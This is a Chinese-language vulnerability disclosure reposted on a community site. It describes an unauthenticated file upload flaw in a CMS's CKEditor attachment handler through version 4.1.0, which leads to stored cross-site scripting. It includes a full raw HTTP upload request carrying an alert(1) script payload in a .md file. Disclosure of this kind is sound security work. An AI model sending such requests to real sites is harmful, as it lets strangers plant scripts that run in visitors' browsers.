影响:<=4.1.0
ckeditor 是第三方网页编辑器。并且您可以看到它的默认文件扩展名(在文件 `coreframe/app/attachment/libs/class/ckditor.class.php` 中)包含一些扩展名,这些扩展名可以在特定文件时由浏览器(例如 Google Chrome)执行为 html可以在web目录下访问。
并且这个 cms 允许在没有用户身份验证的情况下上传文件,因此访客可以上传特定文件。
在 4.0.0
POST /index.php?m=attachment&f=index&v=ckeditor&action=uploadfile&CKEditor=content&CKEditorFuncNum=0&langCode=zh-cn&responseType=json HTTP/1.1
Host: 192.168.1.58
Content-Length: 232
Origin: http://192.168.1.58
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3806.1 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypYLApmLtKBESAKEg
Accept: */*
Referer: http://192.168.1.58/index.php?m=attachment&f=index&v=upload_dialog&callback=callback_ck_images&htmlid=content&limit=10&htmlname=form%5Bthumb%5D&ext=jpg|png|gif&token=c3bc987cbbe8894cf67bfe282f1c002b&_menuid=26
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-HK;q=0.7,zh-CN;q=0.6,zh-TW;q=0.5
Cookie: username=fxxx
Connection: close
------WebKitFormBoundarypYLApmLtKBESAKEg
Content-Disposition: form-data; name="upfile"; filename="xx.md"
Content-Type: application/octet-stream
<html><script>alert(1)</script></html>
------WebKitFormBoundarypYLApmLtKBESAKEg--
In 4.1.0
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 共1条
欢迎您留下宝贵的见解!
- 最新
- 最热
只看作者